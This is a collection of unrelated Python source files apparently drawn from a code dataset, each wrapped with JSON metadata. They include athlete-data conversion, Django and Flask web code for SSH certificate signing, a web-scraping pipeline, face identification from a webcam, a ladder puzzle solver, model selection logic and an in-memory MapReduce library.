AthleteText=AthleteText[:athleteTraverse]+str(totalSeconds)+\",\"+AthleteText[nextComma:]\n    \n    if (athleteTraverse%20000<1):\n        percentage=float(athleteTraverse*100/len(AthleteText))\n        #print(len(AthleteText))\n        print(str(athleteTraverse)+ \"-\" +str(percentage)+\"%\")\n    \n    athleteTraverse=athleteTraverse+1\n    #athleteTraverse=nextComma+1\n\nAthleteText=\"ID,NAME,REGION,TEAM,AFFILIATE,GENDER,AGEyrs,HEIGHTcm,WEIGHTkg,FRANsec,HELENsec,GRACEsec,FILTHY50sec,FIGHTGONEBAD,SPRINT400Msec,RUN5Ksec,CLEANJERKkg,SNATCHkg,DEADLIFTkg,BACKSQUATkg,MAXPULLUPS,13-1Rank,13-1Score,13-2Rank,13-2Score,13-3Rank,13-3Score,13-4Rank,13-4Score,13-5Rank,13-5Score\"+AthleteText\n\nwith open(sys.argv[2], \"w\") as f:\n    f.write(AthleteText+\"\\n\")\n    f.close()\n\n\n","sub_path":"convert-units.py","file_name":"convert-units.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"113699486","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef index(request):\n    title = 'Phastload'\n    sitename = 'Main site'\n    descr = 'Description'\n    context = {'title' : title, 'sitename' : sitename, 'descr' : descr}\n\n    return render(\n        request,\n        'mainsite.html',\n        context\n    )\n    #return HttpResponse(\"Hello, world.\")\n","sub_path":"phastload/mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"284800702","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport os\n\nfrom .items import PageItem\nfrom aqhi.airquality import utils\nfrom aqhi.airquality import models\n\n\nclass SavePagePipeline(object):\n    @staticmethod\n    def _backup_to_file(city_name, res_dir, content, logger):\n        file_name = '{}.html'.format(city_name)\n        with open(os.path.join(res_dir, file_name), 'wb') as f:\n            f.write(content)\n        logger.info(\"Successfully backup the page of city '{}'\".format(city_name))\n\n    def process_item(self, item, spider):\n        logger = spider.custom_logger\n        to_parse = spider.to_parse\n        if isinstance(item, PageItem):\n            city_name = item['name']\n            if to_parse:\n                page_content = item['page'].decode()\n                # save record to database first\n                try:\n                    info_dict, create_status = utils.parse_and_create_records_from_html(page_content, city_name)\n                    record_info = '{name} on {dtm}'.format(name=city_name, dtm=info_dict['update_dtm'])\n                    if create_status['success'] == 1:\n                        logger.info('Successfully save a record: {}'.format(record_info))\n                    else:\n                        err_type = create_status['error_type']\n                        if err_type == 'UniquenessError':\n                            logger.warn('Ignore duplicate record: {}'.format(record_info))\n                        else:\n                            logger.error('Fail to save record: {record} because of {err_type}: {err_msg}'.format(\n                                record=record_info,\n                                err_type=err_type,\n                                err_msg=create_status['info']\n                            ))\n                except Exception as e:\n                    logger.error(\"Exception raised when parsing web page and saving record of city '{city}': {e}\".format(\n                        city=city_name,\n                        e=repr(e)\n                    ))\n                finally:\n                    # backup file\n                    self._backup_to_file(city_name, spider.res_dir, item['page'], logger)\n            else:\n                self._backup_to_file(city_name, spider.res_dir, item['page'], logger)\n","sub_path":"aqhi/airquality/crawler/pm25in/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"248764625","text":"import codecs\nimport os\nimport os.path\nimport shutil\n\nTARGET = \"101_ObjectCategories\"\nOUTDIR = \"caltech101\"\n\nif not os.path.exists(OUTDIR):\n    os.mkdir(OUTDIR)\n\nfor category in os.listdir(TARGET):\n    for file in os.listdir(\"%s/%s\" % (TARGET, category)):\n        image_file = \"%s/%s/%s\" % (TARGET, category, file)\n        rename_file = \"%s/%s-%s\" % (OUTDIR, category, file.replace(\"image_\", \"\"))\n        print(\"%s -> %s\" % (image_file, rename_file))\n        shutil.copyfile(image_file, rename_file)\n","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"580721852","text":"from django.conf import settings\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom .thread import Thread\n\n\nclass 
ThreadView(models.Model):\n    thread = models.ForeignKey(\n        Thread,\n        on_delete=models.CASCADE,\n        related_name='thread_views'\n    )\n    user = models.ForeignKey(\n        settings.AUTH_USER_MODEL,\n        on_delete=models.CASCADE,\n        related_name='thread_views'\n    )\n    viewed_on = models.DateTimeField(default=timezone.now)\n\n    class Meta:\n        constraints = [\n            models.UniqueConstraint(\n                fields=['thread', 'user'],\n                name='unique_thread_user_on_threadview'\n            )\n        ]\n","sub_path":"src/flyapps/threads/models/thread/thread_view.py","file_name":"thread_view.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"500745504","text":"import traceback\nfrom datetime import timedelta\nfrom typing import Dict\n\nfrom flask import Blueprint, request, abort, jsonify\nfrom werkzeug.datastructures import FileStorage\n\nfrom API import db\nfrom KeyManagementToolLib.Helpers.Crypto.Primitives.RawPublicKey import RawPublicKey\nfrom KeyManagementToolLib.Helpers.Crypto.Primitives.Signer import default_backend\nfrom KeyManagementToolLib.Helpers.Crypto.Primitives.Signer.Errors import SignError\nfrom KeyManagementToolLib.MetaStorage.Errors import NotExistingException\nfrom KeyManagementToolLib.MetaStorage.SQLAlchemyMetaStorage import SQLAlchemyMetaStorage\n\ncert_view = Blueprint('cert', __name__)\n\nbackend = default_backend()\nmeta = SQLAlchemyMetaStorage(backend, db.db_session)\n\n\n@cert_view.route('/sign/<groupid>&<userid>&<duration_days>', methods=['POST'])\ndef admin_signPublicKey(groupid, userid, duration_days):\n    # check if the post request has the file part\n    print(request.files)\n    print(list(request.files.keys()))\n    if 'file' not in request.files.keys():\n        return abort(400, \"No file given\")\n    file = request.files['file']  # type: FileStorage\n    # if user does not select file, browser also\n    # submit an empty part without filename\n    # if file.content_length == 0:\n    #     return abort(400, \"Empty file given\")\n    # if file and file.content_length < 10000:\n    bytes_content = file.stream.read(10000)\n    if len(bytes_content) == 0:\n        return abort(400, \"Empty file given\")\n\n    str_content = bytes_content.decode('utf-8')\n    employee_public_key = RawPublicKey(str_content)\n    try:\n        group = meta.getProjectGroupByID(groupid)\n    except NotExistingException:\n        return abort(404, \"No such Group with id \" + repr(groupid))\n    project = meta.getProjectByID(group.in_project)\n    ca = meta.makeProjectGroupCA(groupid)\n\n    try:\n        user = meta.getUserByID(userid)\n    except NotExistingException:\n        return abort(404, \"No such User with id \" + repr(userid))\n    serial = meta.getNextCertificateSerial()\n    cert = backend.signPublicKeyWithPrivateKeyForUserForProject(employee_public_key, ca.ca_private_key,\n                                                                user.username,\n                                                                group.group_name, project.project_name,\n                                                                project.project_domain,\n                                                                serial, timedelta(days=duration_days))\n    return cert.str_repr\n\n\n@cert_view.route('/signme/<employeeid>/<return_type>', methods=['POST'])\ndef user_signPublicKey(employeeid, return_type):\n    with meta:\n        # Todo: authentication of user, anyone could upload his public key and bruteforce employeeids, certificates table\n        # gets bloated, maybe auth-service makes request to this api\n        return_type = return_type.lower()\n        # print('return_type', return_type, return_type is 'dict', return_type is 'list')\n        if return_type not in ('list', 'dict'):\n            return abort(400, \"Unsupported return type\")\n        try:\n            employee = meta.getEmployeeByID(employeeid)\n        except NotExistingException:\n            return abort(404, \"No such Employee with id \" + repr(employeeid))\n        if 
'file' not in request.files.keys():\n return abort(400, \"No file given\")\n # Todo: request.files propert call raises OSError: Invalid chunk header\n file = request.files['file'] # type: FileStorage\n # if user does not select file, browser also\n # submit an empty part without filename\n # if file.content_length == 0:\n # return abort(400, \"Empty file given\")\n # if file and file.content_length < 10000:\n bytes_content = file.stream.read(10000)\n if len(bytes_content) == 0:\n return abort(400, \"Empty file given\")\n str_content = bytes_content.decode('ascii')\n employee_public_key = RawPublicKey(str_content)\n\n certs = {} # type: Dict[str, Dict[str, str]]\n for ca, user, host, group, project, (start, end) in meta.getGrantedMetaForEmployee(\n employee.employeeid):\n # print(ca_id, username, user_id, hostname, groupname, projectname, projectdomain)\n serial = meta.getNextCertificateSerial()\n try:\n cert = backend.signPublicKeyWithPrivateKeyForUserForProject(employee_public_key, ca.ca_private_key,\n user.username,\n group.group_name,\n project.project_name,\n project.project_domain, serial,\n (start, end))\n except SignError as e:\n traceback.print_exc()\n return abort(500, \"Unable to sign key, \" + repr(e))\n host_user_id = meta.getHostUserMappingID(host.host_id, user.user_id).host_user_id\n meta.addCertificate(cert, ca.authority_id, host_user_id, employee.employeeid)\n identifier = user.username + '__' + host.host_name + '__' + group.group_name + '__' + project.project_name\n identifier = identifier.replace(' ', '_')\n certs[identifier] = {\n 'cert': cert.str_repr,\n 'user': user.username,\n 'host': host.host_name,\n 'address': host.host_address,\n 'group': group.group_name,\n 'project': project.project_name\n }\n if return_type == 'dict':\n return jsonify(certs)\n if return_type == 'list':\n return jsonify([certs[k]['cert'] for k in certs.keys()])\n\n\nraise NotImplementedError","sub_path":"API/views/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344445049","text":"import sys\nsys.setrecursionlimit(2000)\ninput = sys.stdin.readline\n\nN, M, H = map(int, input().split())\nboard = [[0] * N for _ in range(H)]\nminval = 4\nladders = set()\n\nfor i in range(M):\n x, y = map(int, input().split())\n board[x-1][y-1] = 1\n\ndef play(board):\n for start in range(N):\n cur_y = start\n for cur_x in range(H):\n if board[cur_x][cur_y] == 1:\n cur_y += 1\n elif cur_y > 0 and board[cur_x][cur_y-1] == 1:\n cur_y -= 1\n if start != cur_y:\n return False\n return True\n\ndef dfs(count, x, y):\n global minval\n if play(board):\n minval = min(minval, count)\n return\n if count == 3 or minval <= count:\n return\n for i in range(x, H):\n k = y if i == x else 0\n for j in range(k, N-1):\n if board[i][j] == 0 and board[i][j+1] == 0:\n board[i][j] = 1\n dfs(count+1, i, j+2)\n board[i][j] = 0\n \ndfs(0, 0,0)\n\nif minval == 4:\n print(-1)\nelse:\n print(minval)","sub_path":"삼성 SW 역량 테스트 기출 문제/15684_사다리조작.py","file_name":"15684_사다리조작.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56075579","text":"import pandas as pd\n\nfrom source.query.merger.merger_triplets_generator import MergerStrategiesProvider\nfrom source.query.scores_service.domain import ScorerKey, MergerKey\nfrom source.storage.stores.artifact_store.interface import ArtifactStoreInterface\nfrom 
source.storage.stores.artifact_store.types.quest.model_selector import ModelSelectionSummaryArtifact\nfrom source.storage.stores.general_quest_data_store.interface import GeneralQuestDataStoreInterface\nfrom source.storage.stores.split_kernel_store.interface import SplitKernelStoreInterface\n\n\nclass ModelSelector(object):\n def __init__(self, scores_service, artifact_store, general_quest_data_store,\n split_kernel_store, model_loss_calculator, merging_tasks_generator):\n \"\"\"\n @type scores_service: L{ScoresService}\n\n @type split_kernel_store: L{SplitKernelStoreInterface}\n @type general_quest_data_store: L{GeneralQuestDataStoreInterface}\n @type merging_tasks_generator: L{MergerStrategiesProvider}\n\n @type artifact_store: L{ArtifactStoreInterface}\n @type model_loss_calculator:\n \"\"\"\n self.__split_kernel_store = split_kernel_store\n self.__scores_service = scores_service\n self.__general_quest_data_store = general_quest_data_store\n self.__merging_tasks_generator = merging_tasks_generator\n self.__artifact_store = artifact_store\n\n self.__model_loss_calculator = model_loss_calculator\n\n def retrieve_best_merger_key(self, customer_id, quest_id, past_queries_metadata, present_query_metadata, ml_conf,\n merger_conf, preselected_merger, hit_rate_thresholds, feature_flags):\n merger_keys_to_str_map = self.__map_merger_keys_to_str(ml_conf, merger_conf)\n\n mergers_eligible_for_selection = {key: value for key, value in merger_keys_to_str_map.items()\n if 'ExternalScorer' not in key and 'RandomScorer' not in key}\n\n # If FDE overrides model selection by past, return his fixed scorer:\n if len(preselected_merger) > 0:\n # if selected scorer is ensemble\n if preselected_merger[\"scorer_name\"] == 'logistic_ensemble':\n scorer_key = ScorerKey(preselected_merger[\"scorer_name\"], preselected_merger.get('scorer_params', None),\n 'internal')\n else:\n\n scorer_key = ScorerKey(preselected_merger[\"scorer_name\"], preselected_merger.get('scorer_params', None))\n selected_merger_key = MergerKey(preselected_merger['merger_name'], preselected_merger['params'], scorer_key)\n\n else:\n # If past exists, apply model selection by past\n if self.__check_if_past_exists(past_queries_metadata, customer_id, quest_id, feature_flags):\n selected_merger_key = self.__get_best_model_by_past(mergers_eligible_for_selection,\n customer_id, quest_id,\n past_queries_metadata, hit_rate_thresholds,\n feature_flags)\n # Output default merger\n else:\n selected_merger_key = self.__get_default_model(mergers_eligible_for_selection)\n\n # Always try to run algorithm on present query\n # noinspection PyBroadException\n try:\n self.select_single_query_model(mergers_eligible_for_selection, customer_id, quest_id,\n present_query_metadata, hit_rate_thresholds, feature_flags)\n except Exception:\n pass\n\n return selected_merger_key\n\n @staticmethod\n def __get_triplet_by_merger_id(merger_tasks, merger_id):\n df = pd.DataFrame({name: [a[name] for a in merger_tasks] for name in [\"merger_model\", \"scorer_id\", \"variant\",\n \"merger_id\"]})\n res = df[df[\"merger_id\"] == merger_id].values[0]\n return tuple(res)\n\n def __get_best_model_by_past(self, mergers_keys_map, customer_id, quest_id, queries_metadata, hit_rate_thresholds,\n feature_flags):\n\n present_selection = None\n for query_metadata in queries_metadata:\n # fetch data\n best_merger_key, thresholds, losses = self.select_single_query_model(mergers_keys_map, customer_id, quest_id,\n query_metadata, hit_rate_thresholds,\n feature_flags)\n\n if query_metadata.role 
== 'validation_past':\n present_selection = best_merger_key\n\n return present_selection\n\n @staticmethod\n def __remove_complex_models(merger_keys_str_map, thresh_hr_df):\n\n good_mergers = [merger_name for merger_name, merger_key in merger_keys_str_map.items() if\n ((merger_key.model_name == \"LogisticRegression\" and\n merger_key.model_params.values()[0] == 1e-06) or\n (merger_key.model_name == \"BaggingRegression\") or\n (merger_key.model_name == \"RandomForest\") or (merger_key.model_name == \"Query0Merger\"))]\n return thresh_hr_df[good_mergers]\n\n def extract_best_merger_per_query(self, merger_keys_str_map, hit_rates, kernel_summary, hit_rate_thresholds):\n # merging_tasks_eligible_for_selection = \\\n # filter(lambda x: all(name not in x['scorer_id'] for name in ['ExternalScorer', 'RandomScorer']),\n # merging_tasks)\n relevant_sorted_thresholds, models_losses = self.__model_loss_calculator.calc_models_losses(hit_rates,\n kernel_summary,\n hit_rate_thresholds)\n\n if models_losses is not None:\n\n best_model_name, best_model_loss = models_losses.idxmin().values[0], models_losses.min().values[0]\n best_merger_key = merger_keys_str_map[best_model_name]\n else:\n # TODO(Shahar): add tests for this flow: where max hit rates are 0 for all selected thresholds\n best_merger_key = self.__get_default_model(merger_keys_str_map)\n best_model_loss = -1\n\n return best_merger_key, best_model_loss, relevant_sorted_thresholds, models_losses\n\n def __get_all_mergers_hr(self, customer_id, quest_id, query_id, feature_flags, merger_keys_str_map):\n all_merger_hr = self.__scores_service.load_mergers_precisions(customer_id, quest_id, query_id,\n feature_flags, merger_keys_str_map)\n\n return all_merger_hr\n\n def __build_query_selection_artifact(self, query_metadata, customer_id, quest_id, best_merger_key,\n best_model_loss, thresholds, losses):\n\n best_merger_id = str(best_merger_key)\n best_merger_name = best_merger_key.model_name\n best_merger_params = best_merger_key.model_params\n best_scorer_name = best_merger_key.scorer_name\n\n if losses is not None:\n\n losses_artifact = losses.to_dict()\n else:\n losses_artifact = {}\n\n artifact = ModelSelectionSummaryArtifact(customer_id, quest_id, query_metadata.query_id, query_metadata.role,\n best_merger_id, best_merger_name, best_scorer_name, best_merger_params,\n best_model_loss, list(thresholds), losses_artifact)\n\n return artifact\n\n def select_single_query_model(self, merger_keys_str_map, customer_id, quest_id, query_role, hit_rate_thresholds,\n feature_flags):\n hit_rates = self.__get_all_mergers_hr(customer_id, quest_id, query_role.query_id, feature_flags,\n merger_keys_str_map)\n simple_models_hr = self.__remove_complex_models(merger_keys_str_map, hit_rates)\n\n kernel_summary = self.__general_quest_data_store.load_kernel_summary_new(customer_id, quest_id,\n query_role.query_id)\n\n best_merger_key, best_model_loss, thresholds, losses = self.extract_best_merger_per_query(merger_keys_str_map,\n simple_models_hr,\n kernel_summary,\n hit_rate_thresholds)\n\n selection_artifact = self.__build_query_selection_artifact(query_role, customer_id,\n quest_id, best_merger_key, best_model_loss,\n thresholds, losses)\n\n self.__artifact_store.store_artifact(selection_artifact)\n return best_merger_key, thresholds, losses\n\n def __get_default_model(self, eligible_merger_keys_map):\n logistic_regressions_models = [model_key for model_key in eligible_merger_keys_map.values() if\n model_key.model_name == \"LogisticRegression\"]\n also_logistic_ensemble = 
[model_key for model_key in logistic_regressions_models if\n model_key.scorer_name.startswith('logistic_ensemble')]\n\n also_default_variants = [model_key for model_key in also_logistic_ensemble\n if model_key.model_params.get('regularization_factor', None) == 1e-06 and\n model_key.scorer_name.endswith('regularization_factor=0.000001')]\n\n if len(also_default_variants) > 0:\n best_effort_collection = also_default_variants\n elif len(also_logistic_ensemble) > 0:\n best_effort_collection = also_logistic_ensemble\n elif len(logistic_regressions_models) > 0:\n best_effort_collection = logistic_regressions_models\n else:\n best_effort_collection = eligible_merger_keys_map.values()\n\n return best_effort_collection[0]\n\n def __check_if_ground_in_validation_past(self, past_queries_metadata, customer_id, quest_id, feature_flags):\n validation_query_id = [query_metadata.query_id for query_metadata in past_queries_metadata if\n query_metadata.role == 'validation_past'][0]\n kernel_summary = self.__general_quest_data_store.load_kernel_summary_new(customer_id, quest_id,\n validation_query_id)\n ground_in_past = kernel_summary['summary']['num_ground']\n return ground_in_past>0\n\n def __get_model_id(self, merger_model, merger_variant, scorer_id):\n\n params_str = '_'.join(\"%s=%s\" % (key, val) for (key, val) in\n merger_variant.iteritems())\n merger_id = \"_\".join([merger_model, params_str])\n return \"_\".join([merger_id, scorer_id])\n\n def __map_merger_keys_to_str(self, ml_conf, merger_conf):\n merging_tasks = list(self.__merging_tasks_generator.get_merging_tasks(ml_conf, merger_conf))\n merger_key_str_map = {}\n for merging_task in merging_tasks:\n merger_key = MergerKey(merging_task[\"merger_model\"], merging_task[\"variant\"],\n merging_task[\"scorer_id\"])\n merger_key_str_map[str(merger_key)] = merger_key\n return merger_key_str_map\n\n def __check_if_past_exists(self, past_queries_metadata, customer_id, quest_id, feature_flags):\n return len(past_queries_metadata) > 0 and self.__check_if_ground_in_validation_past(past_queries_metadata,\n customer_id, quest_id,\n feature_flags)\n\n\n","sub_path":"source/query/model_selection/model_selector.py","file_name":"model_selector.py","file_ext":"py","file_size_in_byte":12393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"350226222","text":"import json\nimport re\nimport time\n\nfrom six.moves import queue\nimport handler\nimport osvcd_shared as shared\nimport rcExceptions as ex\nfrom rcGlobalEnv import rcEnv\n\n\nclass Handler(handler.Handler):\n \"\"\"\n Wait for the current data generation number to reach all live nodes.\n \"\"\"\n routes = (\n (\"GET\", \"sync\"),\n )\n prototype = [\n ]\n access = {\n \"roles\": [\"guest\"],\n \"namespaces\": \"ANY\",\n }\n\n def action(self, nodename, thr=None, stream_id=None, **kwargs):\n thr.selector = \"\"\n ref_gen = shared.GEN\n if not thr.event_queue:\n thr.event_queue = queue.Queue()\n if not thr in thr.parent.events_clients:\n thr.parent.events_clients.append(thr)\n if self.match(ref_gen):\n return {\"status\": 0, \"data\": {\"satisfied\": True, \"gen\": ref_gen}}\n timeout = time.time() + 60\n end = False\n while True:\n left = timeout - time.time()\n if left < 0:\n left = 0\n try:\n thr.event_queue.get(True, left if left < 3 else 3)\n except queue.Empty:\n if left < 3:\n end = True\n if self.match(ref_gen):\n return {\"status\": 0, \"data\": {\"satisfied\": True, \"gen\": ref_gen}}\n if end:\n return {\"status\": 1, \"data\": {\"satisfied\": 
False, \"gen\": ref_gen}}\n\n def match(self, ref_gen):\n for node, gen in shared.LOCAL_GEN.items():\n if gen < ref_gen:\n return False\n return True\n\n","sub_path":"lib/handlerGetSync.py","file_name":"handlerGetSync.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393276791","text":"import cv2\r\nimport dlib\r\nimport encoding_functions\r\nimport pickle\r\n\r\n\r\nclass IdentifyVideo:\r\n\r\n with open(\"Classifier/Classifier_Model.clf\", 'rb') as f:\r\n knn_clf = pickle.load(f)\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def classify_face_for_video(self, image):\r\n\r\n face_name = \"Unknown\"\r\n\r\n face_bounding_boxes = encoding_functions.face_locations(image)\r\n landmarks = encoding_functions.raw_face_landmarks(image, image_face_locations=face_bounding_boxes)\r\n\r\n if len(face_bounding_boxes) == 0:\r\n return \"Unknown\"\r\n\r\n encodings = encoding_functions.extract_encodings(image, facial_landmarks=landmarks)\r\n\r\n # Use the KNN model to find the best matches for the test face\r\n closest_distances = self.knn_clf.kneighbors(encodings, n_neighbors=1)\r\n are_matches = [closest_distances[0][i][0] <= 0.6 for i in\r\n range(len(face_bounding_boxes))] # distance_threshold = 0.6\r\n\r\n for pred, loc, rec in zip(self.knn_clf.predict(encodings), face_bounding_boxes, are_matches):\r\n\r\n if rec:\r\n face_name = pred\r\n else:\r\n face_name = \"Unknown\"\r\n\r\n return face_name\r\n\r\n def classify_faces(self):\r\n\r\n face_detector = dlib.get_frontal_face_detector()\r\n\r\n capture = cv2.VideoCapture(0, cv2.CAP_DSHOW)\r\n face_name_list = []\r\n while True:\r\n ret, frame = capture.read()\r\n\r\n faces = face_detector(frame, 1)\r\n\r\n for face in faces:\r\n left = face.left()\r\n top = face.top()\r\n right = face.right()\r\n bottom = face.bottom()\r\n\r\n width = right - left\r\n height = bottom - top\r\n\r\n image_crop = frame[top:top + height, left:left + width]\r\n\r\n face_name = (self.classify_face_for_video(image_crop))\r\n face_name_list.append(face_name)\r\n\r\n cv2.rectangle(frame, (left - 5, bottom + 5), (right + 5, top - 20), (0, 255, 0), 3)\r\n cv2.rectangle(frame, (left - 7, bottom + 5),\r\n (right + 7, bottom + 20), (0, 255, 0), -1)\r\n cv2.putText(frame, face_name, (left - 5, bottom + 15), cv2.FONT_HERSHEY_COMPLEX, 0.5,\r\n (255, 255, 255), 2)\r\n\r\n cv2.imshow(\"Live Camera\", frame)\r\n\r\n if cv2.waitKey(100) & 0xFF == 27:\r\n break\r\n\r\n cv2.destroyAllWindows()\r\n return face_name_list\r\n","sub_path":"identify_faces_from_video.py","file_name":"identify_faces_from_video.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163117907","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys, os, mysql.connector\nfrom minuteaction import MinuteAction\nfrom houraction import HourAction\nfrom dayaction import DayAction\nfrom a7action import A7Action\n\ndef main(actionDbConfig, analyticsDbConfig):\n minuteAction = MinuteAction(actionDbConfig, analyticsDbConfig)\n minuteAction.setDaemon(True)\n minuteAction.start()\n\n hourAction = HourAction(analyticsDbConfig)\n hourAction.setDaemon(True)\n hourAction.start()\n\n dayAction = DayAction(analyticsDbConfig)\n dayAction.setDaemon(True)\n dayAction.start()\n\n a7Action = A7Action(analyticsDbConfig)\n a7Action.setDaemon(True)\n a7Action.start()\n\n # keep program doesn't exit\n count = 0\n while 1:\n count += 
1\n\nif __name__ == '__main__':\n #\n # Configure MySQL login and database to use in config.py\n #\n from config import Config\n actionDbConfig = Config.getActionDbInfo().copy()\n analyticsDbConfig = Config.getAnalyticsDbInfo().copy()\n main(actionDbConfig, analyticsDbConfig)\n","sub_path":"Source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"390573213","text":"\"\"\"In-memory MapReduce. Get weird.\n\nSee :obj:`MapReduce` for an example.\n\"\"\"\n\n\nimport abc\nimport builtins\nfrom collections import defaultdict\nfrom inspect import isgeneratorfunction\nimport itertools as it\nfrom functools import partial\nimport operator as op\n\n\n__all__ = [\"ElementCountError\", \"MapReduce\"]\n\n\n__version__ = \"1.0\"\n\n\nclass MapReduce(object):\n\n \"\"\"In-memory MapReduce framework.\n\n Subclass this base class and implement :meth:`mapper` and\n :meth:`reducer` methods to produce an object that can run a map reduce\n task.\n\n Output can be customized by overriding :meth:`output`, and sorting can\n be controlled via these properties: :attr:`sort_map_with_value`,\n :attr:`sort_map_reverse`, :attr:`sort_reduce_with_value`, and\n :attr:`sort_reduce_reverse`.\n\n Subclasses are also given complete control over :meth:`__init__`, and can\n implement a context manager by overloading :meth:`__enter__` and\n :meth:`__exit__`. The default implementation provides a :meth:`close`\n that can be overloaded to perform any teardown when exiting the context\n manager.\n\n See :meth:`__call__` for how to execute the :meth:`mapper` and/or the\n :meth:`reducer` concurrently.\n\n Example Word Count Task\n -----------------------\n\n This is not necessarily the fastest or best way to count words, but it\n is the easiest to read. The ``mapper()`` takes a line of text, split it\n into words, and emits tuples where the first element is the word and the\n second is a 1. The ``reducer()`` receives the word and a bunch of 1's, one\n for each instance of the word across all the input text. The\n ``reducer()`` counts the 1's and emits a tuple where the first element\n is the word and the second is a count of all instances of that word across\n the entire input text.\n\n .. code-block:: python\n\n from tinymr import MapReduce\n\n class WordCount(MapReduce):\n\n def mapper(self, item):\n line = item.lower()\n for word in line.split():\n yield word, 1\n\n def reducer(self, key, values):\n return word, sum(values)\n\n The task can be invoked like this:\n\n .. code-block:: python\n\n with WordCount() as mr, open('data.txt') as f:\n results = mr(f)\n\n The output of this task is a dictionary mapping keys to values (the default\n implementation) and would look something like:\n\n .. code-block:: json\n\n {\n \"word\": 345,\n \"the\": 4,\n \"another\": 71\n }\n\n See :meth:`mapper` and :meth:`reducer` for information about how to sort\n data and :meth:`output` for information about how to customize what the\n task returns.\n \"\"\"\n\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def mapper(self, item):\n\n \"\"\"Map phase.\n\n Receives a single item from the input stream and produces one or\n more output ``tuple``s with 2 or 3 elements. The first element is\n always used for partitioning and the last is always passed to the\n ``reducer()``:\n\n .. 
code-block::\n\n (partition, value)\n\n but if the middle element is present then the data is sorted according\n to that value prior to being passed to ``reducer()``.\n\n .. code-block::\n\n (partition, sort, value)\n\n All elements emitted by the ``mapper()`` must be of the same length,\n however for performance reasons only the first is checked.\n\n This mapper looks for lines in a file containing the word\n ``fox`` and passes those lines to the ``reducer()`` in sorted order.\n\n .. code-block:: python\n\n def mapper(self, path):\n\n with open(path) as f:\n\n for idx, line in enumerate(f):\n if \"fox\" in line.lower().split():\n yield path, idx, line\n\n A ``mapper()`` can either ``return`` a single value or ``yield`` many.\n This ``mapper()`` just indicates if the word \"fox\" appears in a text\n file:\n\n .. code-block:: python\n\n import itertools as it\n\n def mapper(self, path):\n\n with open(path) in f:\n text = f.read()\n text = text.lower()\n words = set(text.split())\n\n contains_fox = \"fox\" in words\n return item, contains_fox\n\n and this ``mapper()`` does the same but by streaming the file and\n checking each line:\n\n .. code-block:: python\n\n def mapper(self, item):\n\n with open(item) as f:\n for line in f:\n if \"fox\" in line.lower().split():\n yield item, 1\n break\n\n Normally only the 2nd key enables sorting, but the value itself can\n be integrated into sorting with the :attr:`sort_map_with_value`\n attribute.\n\n If ``mapper()`` emits 3 elements and :attr:`sort_with_map_value` is\n enabled, then the results with be sorted based on the sort element AND\n the value element. Results can be sorted in reverse with\n :attr:`sort_map_reverse`, which can be configured similarly to\n :attr:`sort_map_with_value`.\n\n Parameters\n ----------\n item : object\n A single item from the input data stream.\n\n Returns\n -------\n A ``tuple`` containing 2 or 3 elements. Can also ``yield`` multiple\n ``tuple``s.\n \"\"\"\n\n @abc.abstractmethod\n def reducer(self, key, values):\n\n \"\"\"Reduce phase.\n\n Receives values corresponding to a single partition. May or may\n not be sorted depending on the ``mapper()`` implementation and\n :attr:`sort_map_with_value`.\n\n Outputs a ``tuple`` with 2 or 3 keys that are subjected to the same\n sorting rules as :meth:`mapper`.\n\n Like :meth:`mapper`, ``reducer()`` can ``return`` a single value or\n ``yield`` multiple. For :meth:`mapper` this has no impact aside from\n making some implementations easier, but for ``reducer()`` this impacts\n how the data is passed on to :meth:`output`. Using the word count\n example, this ``reducer()`` returns a single value:\n\n .. code-block:: python\n\n def reducer(self, key, values):\n return key, sum(values)\n\n whereas this ``reducer()`` yields a single value:\n\n .. code-block:: python\n\n def reducer(self, key, values):\n yield key, sum(values)\n\n The difference is that for the former :meth:`output` receives a\n dictionary that looks like:\n\n .. code-block:: json\n\n {\n \"word\": 345,\n \"the\": 4,\n \"another\": 71\n }\n\n however for the latter :meth:`output` receives this:\n\n .. code-block:: json\n\n {\n \"word\": [345],\n \"the\": [4],\n \"another\": [71]\n }\n\n The difference is that ``yield``ing values gives :meth:`output` a list\n of values for each key. 
